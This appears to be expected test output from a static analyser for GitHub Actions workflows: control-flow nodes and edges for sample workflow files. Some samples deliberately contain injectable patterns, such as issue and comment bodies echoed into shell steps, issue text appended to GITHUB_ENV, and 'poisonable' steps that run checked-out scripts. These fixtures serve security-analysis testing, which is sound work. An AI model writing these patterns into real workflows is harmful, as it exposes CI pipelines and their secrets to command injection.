+| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| 